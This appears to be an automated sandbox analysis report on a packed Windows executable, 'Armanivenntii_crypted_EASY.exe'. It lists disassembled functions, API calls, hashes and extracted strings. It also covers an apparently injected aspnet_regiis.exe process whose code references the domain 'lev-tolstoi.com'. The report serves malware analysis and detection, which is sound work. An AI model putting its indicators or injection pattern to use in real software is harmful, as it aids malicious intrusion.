API String ID: 0-2076589724
Opcode ID: 576492d95d343a25e9edf1df85e4c313b781518bf2a32bff4088d3978d012c7d
Instruction ID: d154b0da29fbafad796ce2888ca202e958a4568d2db38eab4b3708da964fdffe
Opcode Fuzzy Hash: 576492d95d343a25e9edf1df85e4c313b781518bf2a32bff4088d3978d012c7d
Instruction Fuzzy Hash: 80527B75F44604CFDB04CFACC994BDEBBF9AF4A314F20421AD925ABBA5C6259805CF42

Function 6CDE2865 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CDE2860,?,?,00000008,?,?,6CDE2463,00000000), ref: 6CDE2A92

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: b9e53881e5b7bb124137e292b2bd3ce373f4f69faa8cd70d6fb785c4ff0c6031
Instruction ID: f038f87d4ca015305081a155a341ba4ac2d007c560b3379ac22409e9e9cdd281
Opcode Fuzzy Hash: b9e53881e5b7bb124137e292b2bd3ce373f4f69faa8cd70d6fb785c4ff0c6031
Instruction Fuzzy Hash: FEB1293161060ADFD715CF28C88AB657BE0FF49368F258658E9E9CF6A5C335D981CB40

Function 6CDD7EB9 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CDD7ECF

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: f381a6bfbec0235af867b34dccee60bfc9e8272bc4bd0084b71776fdc84a5025
Instruction ID: 5a165c43a519ee84e0e44fb2fcfd0160ab914903d12351db98d6a39a1835e116
Opcode Fuzzy Hash: f381a6bfbec0235af867b34dccee60bfc9e8272bc4bd0084b71776fdc84a5025
Instruction Fuzzy Hash: 9751BDB1F01205DFEB15DF65C8817AABBF0FB48344F26866AD415EBA94D378E940CB90

Function 6CDD981A Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 6CDD9939
___TypeMatch.LIBVCRUNTIME ref: 6CDD9A47
CatchIt.LIBVCRUNTIME ref: 6CDD9A98
_UnwindNestedFrames.LIBCMT ref: 6CDD9B99
CallUnexpected.LIBVCRUNTIME ref: 6CDD9BB4

Strings

csm, xrefs: 6CDD98C4
csm, xrefs: 6CDD9857
csm, xrefs: 6CDD9970

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4119006552-393685449
Opcode ID: 6e3e57235f8a7c3f965c8d93656a39b8dd3bdb0ec5a534f846088f37aa99d1aa
Instruction ID: b96cc9fcb1efe83d8185161d3957d18f97992b8c8ba0437e250eeef9f9132feb
Opcode Fuzzy Hash: 6e3e57235f8a7c3f965c8d93656a39b8dd3bdb0ec5a534f846088f37aa99d1aa
Instruction Fuzzy Hash: BCB18D71C00209EFCF15CFA5C89099EB7B5FF04318B17519AE8156BA21DB32FA55CBA1

Function 6CDD87D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6CDD8807
___except_validate_context_record.LIBVCRUNTIME ref: 6CDD880F
_ValidateLocalCookies.LIBCMT ref: 6CDD8898
__IsNonwritableInCurrentImage.LIBCMT ref: 6CDD88C3
_ValidateLocalCookies.LIBCMT ref: 6CDD8918

Strings

csm, xrefs: 6CDD88AD

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: c0495546c3508288048342518a874a4958e2c304e332c4565e4c68a4a4b49d40
Instruction ID: 8e7644aea8214761d5ad71e99d294b4e590a4ad6b693ab1fac8a8ffe7d990647
Opcode Fuzzy Hash: c0495546c3508288048342518a874a4958e2c304e332c4565e4c68a4a4b49d40
Instruction Fuzzy Hash: CC41B034E01208EFCF02DF68CC80A9EBBB5AF45318F159156E9159BBA1D731EA45CBE1

Function 6CDDD6F8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,380F9D98,?,6CDDD807,6CDD7358,?,00000000,?,?,?), ref: 6CDDD7B9

Strings

ext-ms-, xrefs: 6CDDD763
api-ms-, xrefs: 6CDDD74F

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: dbb8a19159b459d13b173fa2a91bb8bb1433578fb1226fc4b236a0c4d70d9e70
Instruction ID: 0308ef07ee17e7729a3840f5be617cc90deea9dc3cbeb14d64f5391054d79b02
Opcode Fuzzy Hash: dbb8a19159b459d13b173fa2a91bb8bb1433578fb1226fc4b236a0c4d70d9e70
Instruction Fuzzy Hash: 2F21D875F05111F7DF21AB658C40E4A377D9B46768B260664EA16A7690EB70F900CBF0

Function 6CDD8E6C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,6CDD8E63,6CDD8BBE), ref: 6CDD8E7A
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CDD8E88
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CDD8EA1
SetLastError.KERNEL32(00000000,6CDD8E63,6CDD8BBE), ref: 6CDD8EF3

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 39b28294b37de194bc730a48e9cb6072085db9552197a7b8a635cc4f3afc6185
Instruction ID: 9cef35a801164697cf646b0155bde3bf00a83eda32f304d5e3221492f6a84296
Opcode Fuzzy Hash: 39b28294b37de194bc730a48e9cb6072085db9552197a7b8a635cc4f3afc6185
Instruction Fuzzy Hash: 3901D272B0D212AAAA5217B5EC8564B37B8DB027BC732033AE5154ADF0EF53E80847D4

Function 6CDDC92C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe, xrefs: 6CDDC948

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe
API String ID: 0-1209501751
Opcode ID: 7f79b7842bde07a048cca5919323fe0bda8785d246ae78a2e3f81916839b0130
Instruction ID: 25288b1ea427d34688417688277d00d66467607771439f6e930810fb4e4a5e36
Opcode Fuzzy Hash: 7f79b7842bde07a048cca5919323fe0bda8785d246ae78a2e3f81916839b0130
Instruction Fuzzy Hash: A921C571A09105FF9B10AFB6C84089A77ADEF8536EB064614F956D7A70D731FD008BA0

Function 6CDDA8FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,380F9D98,00000000,?,00000000,6CDE3112,000000FF,?,6CDDA895,?,?,6CDDA869,?), ref: 6CDDA930
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CDDA942
FreeLibrary.KERNEL32(00000000,?,00000000,6CDE3112,000000FF,?,6CDDA895,?,?,6CDDA869,?), ref: 6CDDA964

Strings

CorExitProcess, xrefs: 6CDDA93A
mscoree.dll, xrefs: 6CDDA929

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: e51b5d7d4185cf5de25458d7a61faaf7fcf31f096130f17b0c5b4e85092d7bd2
Instruction ID: 33b0e12bf1e4fc63cba42b3d305ad87f3c71d553d8b9d5285ac555807e773f42
Opcode Fuzzy Hash: e51b5d7d4185cf5de25458d7a61faaf7fcf31f096130f17b0c5b4e85092d7bd2
Instruction Fuzzy Hash: F2018B71A00515EFEF019F90CC05FBE77BDFB09755F014525F916A26A0DB749504CB50

Function 6CDD9BBF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 6CDD9BE4
CatchIt.LIBVCRUNTIME ref: 6CDD9CCA

Strings

RCC, xrefs: 6CDD9BFE
MOC, xrefs: 6CDD9BF6

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 8800dc1a1fa64c9de0b2386556c5a3ec4ae4ce5d9acd2dacaf89e8734ddc0567
Instruction ID: 87acc2bd5a736361eab4545abfebb8fab633f1b12345a49f45b1137e814451c8
Opcode Fuzzy Hash: 8800dc1a1fa64c9de0b2386556c5a3ec4ae4ce5d9acd2dacaf89e8734ddc0567
Instruction Fuzzy Hash: 52415871D00209EFCF06CF98DD90AEE7BB5FF08308F168199F915A6620D736A951DB91

Function 6CDD9442 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6CDD93F3,00000000,?,6CE2D710,?,?,?,6CDD9596,00000004,InitializeCriticalSectionEx,6CDE5450,InitializeCriticalSectionEx), ref: 6CDD944F
GetLastError.KERNEL32(?,6CDD93F3,00000000,?,6CE2D710,?,?,?,6CDD9596,00000004,InitializeCriticalSectionEx,6CDE5450,InitializeCriticalSectionEx,00000000,?,6CDD8F62), ref: 6CDD9459
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6CDD9481

Strings

api-ms-, xrefs: 6CDD9466

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 971c039773d6693004400652e03660670cf9365c55c9613529593fe1998334a3
Instruction ID: 2a1ff66fafeec6c22c9d6cc381f7d7f76415886f92a9438c5b6096d22d6f6021
Opcode Fuzzy Hash: 971c039773d6693004400652e03660670cf9365c55c9613529593fe1998334a3
Instruction Fuzzy Hash: E1E04830744204F7FF901BE1DC05B583E79AB45749F118034FA0CE84E1DF62E4108799

Function 6CDD95C3 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6CDD968A
___AdjustPointer.LIBCMT ref: 6CDD96AD
___AdjustPointer.LIBCMT ref: 6CDD9749

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: dd5fd79015d347857cc5896a31ede9a06e4ee3743a23cc07c5e1bdaea41bc249
Instruction ID: baa3ded6d0d781719c3a4b1ef36e7b4cd60e24f8fedd66218d118ca1624ce54a
Opcode Fuzzy Hash: dd5fd79015d347857cc5896a31ede9a06e4ee3743a23cc07c5e1bdaea41bc249
Instruction Fuzzy Hash: EE512371E06606EFDB058F51D860BAA77B4EF04318F224129F95547AB4EF32F845C790

Function 6CDDC146 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 6CDDD4FA: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CDDF480,?,00000000,-00000008), ref: 6CDDD55B

GetLastError.KERNEL32 ref: 6CDDC1AA
__dosmaperr.LIBCMT ref: 6CDDC1B1
GetLastError.KERNEL32(?,?,?,?), ref: 6CDDC1EB
__dosmaperr.LIBCMT ref: 6CDDC1F2

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 503b1b24cdbf3e36c5953dc00e64189cab5a25cde46c9ebaa2679fe47b90ecf7
Instruction ID: d5a405a2b04afd5253f54b862f52ef28d3b7ec2bbb5bf7315d52d83eb6939e78
Opcode Fuzzy Hash: 503b1b24cdbf3e36c5953dc00e64189cab5a25cde46c9ebaa2679fe47b90ecf7
Instruction Fuzzy Hash: 5021A731E48215EF9B10AFA6C84095BBBBDEF85368B06461AF95597A70D731FC008BA1

Function 6CDDD59D Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6CDDD5A5

Part of subcall function 6CDDD4FA: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CDDF480,?,00000000,-00000008), ref: 6CDDD55B

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CDDD5DD
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CDDD5FD

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: f9a4824807214537955cbe19fa3434fc1496ae9680ac0f4aaa6fcd96603cc055
Instruction ID: e25049b6ce1964f993c5bc8eb5b52ed669639754c15e44ba43f0ff620944fb0c
Opcode Fuzzy Hash: f9a4824807214537955cbe19fa3434fc1496ae9680ac0f4aaa6fcd96603cc055
Instruction Fuzzy Hash: C911D6B1E09519BFAF1127F68C88CBF2A7CDF9A29C7060125F505D1620EB64FD044BB4

Function 6CDE1356 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000,?,?,6CDE0B16,?,00000001,?,?,?,6CDDFDD4), ref: 6CDE136D
GetLastError.KERNEL32(?,6CDE0B16,?,00000001,?,?,?,6CDDFDD4), ref: 6CDE1379

Part of subcall function 6CDE133F: CloseHandle.KERNEL32(FFFFFFFE,6CDE1389,?,6CDE0B16,?,00000001,?,?,?,6CDDFDD4), ref: 6CDE134F

___initconout.LIBCMT ref: 6CDE1389

Part of subcall function 6CDE1301: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CDE1330,6CDE0B03,?,?,6CDDFDD4), ref: 6CDE1314

WriteConsoleW.KERNEL32(?,?,?,00000000,?,6CDE0B16,?,00000001,?,?,?,6CDDFDD4), ref: 6CDE139E

Memory Dump Source

Source File: 00000000.00000002.1696344413.000000006CDC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDC0000, based on PE: true

Associated: 00000000.00000002.1696324315.000000006CDC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394852.000000006CDE4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696498334.000000006CE2E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696527847.000000006CE38000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cdc0000_Armanivenntii_crypted_EASY.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: b9761d891eb5faaf6b1467e0cc71496f73e04bde6cba77ed2aad262833499b88
Instruction ID: 34e9ccf2301eb06e1618045766513b0ecbe5713ed436773714d1d7e24ee7bb65
Opcode Fuzzy Hash: b9761d891eb5faaf6b1467e0cc71496f73e04bde6cba77ed2aad262833499b88
Instruction Fuzzy Hash: 53F09836600119FBCF522FD68D04AC93F7AFB0D3A5B244520FB1895921C732C920DB95

Analysis Process: aspnet_regiis.exePID: 7408, Parent PID: 7340COMMON

Execution Graph

Execution Coverage:	16.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	43.1%
Total number of Nodes:	420
Total number of Limit Nodes:	33

Executed Functions

Function 0041C490 Relevance: 34.4, Strings: 27, Instructions: 604
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[1O7, xrefs: 0041C6F7
!#, xrefs: 0041D018
uw, xrefs: 0041CD45
W%M;, xrefs: 0041C6D6
%] S, xrefs: 0041C744
G!P', xrefs: 0041C6CB
3E-[, xrefs: 0041C72E
=!, xrefs: 0041CB1E
H=^3, xrefs: 0041C6EC
9Y%_, xrefs: 0041C739
yZ{, xrefs: 0041C9A8
n!m#, xrefs: 0041D33E
K9D?, xrefs: 0041C6E1
+QvW, xrefs: 0041C74F
79, xrefs: 0041CB13
89, xrefs: 0041D354
r=Z?, xrefs: 0041D349
qw, xrefs: 0041C7A7
" , xrefs: 0041CB29
ef, xrefs: 0041D278
q-[#, xrefs: 0041C926, 0041C8CE
rq, xrefs: 0041C4F0
F5.K, xrefs: 0041C702
86, xrefs: 0041CB34
=?, xrefs: 0041D023
9;, xrefs: 0041D02E
e%h', xrefs: 0041D333

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: qw$" $%] S$+QvW$3E-[$79$89$86$9Y%_$=!$F5.K$G!P'$H=^3$K9D?$W%M;$[1O7$e%h'$ef$n!m#$q-[#$r=Z?$rq$!#$9;$=?$uw$yZ{
API String ID: 0-3357453141
Opcode ID: f0346f04f7dab28207e766204a78d4f9ce3c5e34d5ba849c1a1f99b64a8fd511
Instruction ID: ded4875e04283c62bef3b85bcac0d4d4c478bcc78591e6b4320f93d218dd1299
Opcode Fuzzy Hash: f0346f04f7dab28207e766204a78d4f9ce3c5e34d5ba849c1a1f99b64a8fd511
Instruction Fuzzy Hash: 1E72E8B42093818FE234DF16D881BEBBBE1BB86344F108A2DD5DD9B245DB748146CF96

Function 00422EB0 Relevance: 26.2, APIs: 5, Strings: 8, Instructions: 3451COMMON

Download Yara Rule

Strings

7;/8, xrefs: 00425A21
SSHN, xrefs: 00422F89
AG, xrefs: 004242DC
%, xrefs: 00423094
PDYY, xrefs: 00422F9D
hFtL, xrefs: 004249DD
O\PB, xrefs: 00422F93
srox, xrefs: 00424523

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 7;/8$O\PB$PDYY$SSHN$hFtL$srox$%$AG
API String ID: 0-1037250187
Opcode ID: bd53928cf83f23d74e3ea7080d5fb51ad646155f1b6176379b169a5e63831b20
Instruction ID: 18550353a4f00b3ef38631325a69d30dea7ce0b6d22f1bdeda8d5f565c17f2af
Opcode Fuzzy Hash: bd53928cf83f23d74e3ea7080d5fb51ad646155f1b6176379b169a5e63831b20
Instruction Fuzzy Hash: 85430170204B918BD325CF39D4943A3FBE2AF96304F548A5EC4EB8B792D778A445CB58

Function 0040A700 Relevance: 25.1, APIs: 1, Strings: 13, Instructions: 584
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessVersion.KERNELBASE(00000000), ref: 0040A9C2

Strings

J17O, xrefs: 0040AA50
8M7K, xrefs: 0040AA58
:9f, xrefs: 0040AB4E
lev-tolstoi.com, xrefs: 0040AC49, 0040AEA7
Tebc, xrefs: 0040AAA8
m]k[, xrefs: 0040AA78
!iVg, xrefs: 0040AAA0
4, xrefs: 0040AB66
#m[k, xrefs: 0040AA98
5, xrefs: 0040AB5E
r_, xrefs: 0040AB7E
Z)_', xrefs: 0040AA20
O=O;, xrefs: 0040AA38

Memory Dump Source

Source File: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

